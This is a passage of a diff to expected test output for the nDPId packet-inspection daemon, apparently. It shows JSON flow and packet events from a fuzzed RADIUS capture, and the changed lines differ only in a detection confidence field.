=="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998576080,"flow_last_seen":1528998576080,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528998576080,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998576080,"flow_last_seen":1528998576080,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528998576080,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":342,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998576181,"flow_last_seen":1528998576181,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528998576181,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1814,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00636{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":342,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1528998576181,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1528998576181,"pkt":"ABRP+4rqcNuYVcUnCABFAAClD7RAAPsRRVLG4hk1CgxAHgcWchAAkUUeC7YAjbHF+KxzM1jmiRGRdJnwnSQBNTAzMTE0ODAwNzEzOTQzMDRAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmFhOTAvYjA6OWY6YmE6NGE6MGU6N2UvMjQzTw4BAAAMFwwAAAwBf\/xQEmpMlHIe9v0pkoCIcMRZLH4="} 01328{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":2,"flow_last_seen":1528998576307,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":697,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":697,"pkt_l4_len":663,"thread_ts_msec":1528998576307,"pkt":"AAAMB6xAABRP+4rqCABFAAKrIWVAAP8RAAAKDEAexuIZNXIQBxQClwAAAbcCj0ICRJPAa6Qqmxpo\/C0gFa8aCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQM3NwZbIqqwAWEwMzExNDgwMDdhMzk0MzA0QHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TYjAtOWYtYmEtNGEtMGUtN2UeJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwZDQ5MGFhMjI1YiwgNWIyMmFhOTAvYjA6OWQ6YmE6NGE6MGU6N2Uvqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} @@ -449,17 +449,17 @@ 01391{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":1,"flow_last_seen":1528998584808,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"thread_ts_msec":1528998584808,"pkt":"AAAMB6xAABRP+4rqCABFAALbIWZAAP8RAO05DEAexuIZNXIQcRQCxwAAAbgCv9zxrJZG2dsJ+s9nZZp6aFsaCgAAV8gOBFVTGgwAAFfIDQYlAGZpGg8AAFfICQlXSVNQUjEwGgkAADghDQM4NwZbIqq4ATUwMzExNDgwMjUwODY0NjI4AXdsYW4ubW5jNDgwDm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TMDAtNTYtY2QtNmQtNDItNTkeJTZjLWIyLWFlLThlLTMxLTgwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPbEwZmYxMGFjMDAwMDAwY2M3OGE4MjI1YiwgNWIyMmE4NzgvMDA6NTY6Y2Q6NmQ6NDI6NTkvMjM1BAasFAEQIKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":346,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998585019,"flow_last_seen":1528998585019,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528998585019,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":22544,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00716{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":346,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":1528998585019,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1528998585019,"pkt":"ABRP+4rqcNuYVcUnCABFAADhD9lAAPwRdvHG4hk1CgxAHgcUWBAAzQh\/C7gAxWTiZLZdO+cme7xhCKfM6MYBNTAzMTE0ODAyNTA4NjQ2MjhAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE4NzgvMDA6NTY6Y2Q6d2Q6NDI6NTkvMjM1T0oBAgBIFwEAAAEFAADyCxcI7XkaT0UFvUk8tJ2YAgUAAMJakSoc8QAAT38LtnrvLnGLAQACCwUAADQNzAWg+MfiRgxSS6PGeYdQEs5faleq8GPWzRgEVPv2RUo="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":346,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998585019,"flow_last_seen":1528998585019,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528998585019,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":22544,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":346,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998585019,"flow_last_seen":1528998585019,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528998585019,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":22544,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 01364{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":347,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":3,"flow_last_seen":1528998585268,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":725,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":725,"pkt_l4_len":691,"thread_ts_msec":1528998585268,"pkt":"AAAMB6xAABRP+4rqCABFAALHIWdAAP8RAAAKDEAexuIZNXIQBxQCswAAAbkCqwwIsTK62hmv9RZW9\/f12AIaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQM4NwZbIqq5ATUwMzExNDgwMjUwODY0NjKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":348,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":284,"global_ts_msec":1528998585453} 00711{"packet_event_id":1,"packet_event_name":"packet","packet_id":348,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":318,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":318,"pkt_l4_len":0,"thread_ts_msec":1528998585268,"pkt":"ABRP+4rqcNuYVcUnCABFADUwD91AAPwRQ57G4hk1CgxAHgcUchABHJkzArkBFPuMuhZj3jbkVosdPxLeAO4aCwAAV8gbBVNQQxpuAAABNxA0w9JZoXWsZGeHUoYiJ9p40yJPEfSCC1VPuzQcz\/tcT9Zniiv93vAfl8Sqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"} 00579{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":349,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","packets-captured":349,"packets-processed":285,"total-skipped-flows":0,"total-l4-payload-len":123530,"total-not-detected-flows":15,"total-guessed-flows":3,"total-detected-flows":55,"total-detection-updates":0,"total-updates":13,"current-active-flows":6,"total-active-flows":76,"total-idle-flows":70,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":456,"global_ts_msec":1528998601376} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":353,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998605741,"flow_last_seen":1528998605741,"flow_idle_time":200000,"flow_min_l4_payload_len":629,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":629,"flow_avg_l4_payload_len":629,"midstream":0,"thread_ts_msec":1528998605741,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1813,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01291{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":353,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":1,"flow_last_seen":1528998605741,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":671,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":671,"pkt_l4_len":637,"thread_ts_msec":1528998605741,"pkt":"AAAMB6xAABRP+4rqCABFAAKRIWpAAP8RAAAKDEAexuIZNXIQBxUCfQAABLwCddn+cEnhcqnQe5pr1rrJmHQaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGQVTUEMaCQAAOCENAzABNTAzMTE0ODgwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZ34IMWNpc2NvBQYAAAAIBAasFAEQCAasFAEWIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIsIDViMjJhYWM5L2YwOjc5OjYwOmQxOjdkOjM3LzI0NDEGAAAAExoxAAAACQErYXVkaXQtc2Vzc2lvbi1pZD0xMGZmMTBhWTAwMPowMGQ1YzlhYTIyNWItBgAAAAFABgAAAA1BBl4AAAZRBDU2NwZbIqrNGhQAAFfIBw5WWldDMlRlc3RMYWIaCgAAV8gIBEVUGhAAAFfICgpTdGFuZGFyZBoQAABXyAsKVGVzdCBMYWIaCQAAV8gPAzEaCgAAV8gQBE5KGhEAAFfIEQtMeW5kaHVyc3QaDAAAV8gSBgAAAMkaFwAAV8gdEVZaVyBDMiBUZXN0IExhYhoLAABXyCUFVnpXGg2qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":353,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998605741,"flow_last_seen":1528998605741,"flow_idle_time":200000,"flow_min_l4_payload_len":629,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":629,"flow_avg_l4_payload_len":629,"midstream":0,"thread_ts_msec":1528998605741,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1813,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":353,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998605741,"flow_last_seen":1528998605741,"flow_idle_time":200000,"flow_min_l4_payload_len":629,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":629,"flow_avg_l4_payload_len":629,"midstream":0,"thread_ts_msec":1528998605741,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1813,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":354,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998605816,"flow_last_seen":1528998605816,"flow_idle_time":200000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1528998605816,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1813,"dst_port":21008,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00591{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":354,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":1,"flow_last_seen":1528998605816,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":147,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":147,"pkt_l4_len":113,"thread_ts_msec":1528998605816,"pkt":"ABRP+4rqcNuYVcUnCABFAACF321AAPwRdKvG4hk1CgxAHgcVUhAAcX0pBbwAafRaWCO5QhnkLZA61WpkFeUBNTAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBZZXR3b3JrLm9yZywgNWIyMmFhYzkvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjQ0"} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":354,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998605816,"flow_last_seen":1528998605816,"flow_idle_time":200000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1528998605816,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1813,"dst_port":21008,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":354,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998605816,"flow_last_seen":1528998605816,"flow_idle_time":200000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1528998605816,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1813,"dst_port":21008,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00587{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":355,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1528997663992,"flow_last_seen":1528997989461,"flow_idle_time":620000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":711,"flow_tot_l4_payload_len":1200,"flow_avg_l4_payload_len":400,"midstream":0,"thread_ts_msec":1528998605816,"l3_proto":"ip4","src_ip":"170.170.170.170","dst_ip":"170.170.170.170","l4_proto":170,"ndpi": {"proto":"Unknown","breed":"Unrated"}} 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":355,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1528997663992,"flow_last_seen":1528997989461,"flow_idle_time":620000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":711,"flow_tot_l4_payload_len":1200,"flow_avg_l4_payload_len":400,"midstream":0,"thread_ts_msec":1528998605816,"l3_proto":"ip4","src_ip":"170.170.170.170","dst_ip":"170.170.170.170","l4_proto":170,"flow_datalink":1,"flow_max_packets":3} 00563{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":356,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998636010,"flow_last_seen":1528998636010,"flow_idle_time":620000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":0,"thread_ts_msec":1528998636010,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","l4_proto":37,"flow_datalink":1,"flow_max_packets":3} @@ -468,15 +468,15 @@ 01218{"packet_event_id":1,"packet_event_name":"packet","packet_id":357,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":697,"pkt_type":2064,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":697,"pkt_l4_len":0,"thread_ts_msec":1528998636010,"pkt":"AAAMB6xAABRP+4rqCBBFAAKrIWxAAP8RAAAKDEAexuIZNXIQBxQClwAAAb4Cj8yIFnOZ6cZavy+ov11X2XMaCgAAV8gOBKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} 00200{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":361,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":22528,"global_ts_msec":1528998639586} 01219{"packet_event_id":1,"packet_event_name":"packet","packet_id":361,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":697,"pkt_type":22528,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":697,"pkt_l4_len":0,"thread_ts_msec":1528998639447,"pkt":"AAAMB6xAABRP+4rqWABFAAKrIW5AAP8RAAAKCEAexuIZNXIQBxQClwAAAcACj3BXfw4b3GMlZswG9bQoL7gaCgAAV8gOBFVTGgwAAFfIDQZXaWZpJQAAAFfICQlXSVNQUjEwGgkAADghDQMzNwZbIqrvATUwMzExNDgwMjMyNTY4NjMxQHdsYW4ubW5jNDkwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TOTAtYjAtZWQtNGUtNzctYTMeJTAwLWE3LTQyLWQwLWUwLXAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJESthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwZDZlYmFhMjI1YiwgNWIybWFhZWIvOTA6YjA6ZWQ6NGU6Nzc6YTMvMjQ1BAasFAEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2T2cCAAAIbQwAABoUAABXyAcOVlpXQzJUZXN0TGFiGgoAAFfICARFVBoQAABXyAoKU3RhbmRhcmQaEAAAV8gLClRlc3QgTGFiGgkAAFfIDwMxGgoAAFfIEAROShoRAABXyBELTHluZGh1cnN0GgwAAFfIEgYAAADJGhdWAFfIHRFWWlcgQzIgVGVzdDdMYWIaCwAAV8glBVZ6VxoNAAA4IQ4HMDcwNzEaDAAAOCERcAAAAAAaFQAAOCESD0ludmFsaWQgVmFsdWUaHQAAOCETFzQwLjgwNDg4Mk4tNzQuMTAyODM5VxoMAAA4IRQGAAABAhoMAAA4IRUGAAAAAhoVAAA4IRYPU3RhZGl1bURpcmVjdBoMAAAFgwcGwFBKmVASZHVbxXaB7Y4HBclkU5O1hA=="} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":366,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1528998576080,"flow_last_seen":1528998643334,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":7430,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1528998643334,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":366,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1528998257171,"flow_last_seen":1528998557443,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":2362,"flow_avg_l4_payload_len":472,"midstream":0,"thread_ts_msec":1528998643334,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 